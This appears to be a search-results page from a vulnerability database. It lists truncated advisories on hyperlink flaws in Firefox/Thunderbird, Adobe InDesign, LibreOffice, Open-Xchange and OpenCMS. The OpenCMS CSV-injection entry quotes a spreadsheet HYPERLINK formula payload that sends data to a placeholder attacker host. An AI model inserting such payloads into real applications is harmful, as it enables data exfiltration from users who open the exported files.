Information Disclosure
Firefox/Thunderbird is vulnerable to information disclosure. If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and...
CVE-2019-7107
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
Code injection
Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2...
Mozilla: Theft of user history data through drag and drop of hyperlinks to and from bookmarks
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
Mozilla Thunderbird < 60.7
The version of Thunderbird installed on the remote macOS or Mac OS X host is prior to 60.7. It is, therefore, affected by multiple vulnerabilities as referenced in the mfsa2019-15 advisory. - A use-after-free vulnerability can occur in the chrome event handler when it is freed while still in use...
CVE-2019-11698
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
UBUNTU-CVE-2019-11698
If a crafted hyperlink is dragged and dropped to the bookmark bar or sidebar and the resulting bookmark is subsequently dragged and dropped into the web content area, an arbitrary query of a user's browser history can be run and transmitted to the content page via drop event data. This allows for...
Security vulnerabilities fixed in Thunderbird 60.7 — Mozilla
If hyperthreading is not disabled, a timing attack vulnerability exists, similar to previous Spectre attacks. Apple has shipped macOS 10.14.5 with an option to disable hyperthreading in applications running untrusted code in a thread through a new sysctl. Firefox now makes use of it on the main...
LibreOffice < 6.1.6, 6.2.x < 6.2.3 Hyperlink Processing Vulnerability (Windows)
The version of LibreOffice installed on the remote Windows host is prior to 6.1.6 or 6.2.x prior to 6.2.3. It is, therefore, affected by a hyperlink processing vulnerability. An attacker may exploit this issue by creating hyperlinks pointing to an executable on the target user's file system. This...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in the New User module for the parameters First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
CVE-2019-9847
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target user's file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
Design/Logic Flaw
A vulnerability in LibreOffice hyperlink processing allows an attacker to construct documents containing hyperlinks pointing to the location of an executable on the target user's file system. If the hyperlink is activated by the victim the executable target is unconditionally launched. Under Windo...
KLA11476 PE vulnerability in LibreOffice
An unspecified vulnerability was found in LibreOffice. Malicious users can exploit this vulnerability via hyperlink processing to gain privileges. Original advisories: CVE-2019-9847 Executable hyperlink targets executed unconditionally on activation. Related products: LibreOffice. CVE list: CVE-2019-9847...
Open-Xchange: Another window.opener issue
Vulnerability Details: Appointment titles are rendered as hyperlinks but were missing a protection against "tab nabbing". Risk: When following a hyperlink to a malicious website, the original tab location (OX App Suite) could be replaced with a URL chosen by the attacker. This can be exploited to...
Adobe InDesign Insecure Hyperlink Handling Vulnerability
Adobe InDesign is a desktop publishing (DTP) application from Adobe that is primarily used for typesetting and editing a variety of printed materials. An insecure hyperlink handling vulnerability exists in Adobe InDesign 14.0.1 and earlier versions. An attacker could exploit this vulnerability to...
openSUSE: Security Advisory for yast2-rmt (openSUSE-SU-2019:1089-1)
The remote host is missing an update for the...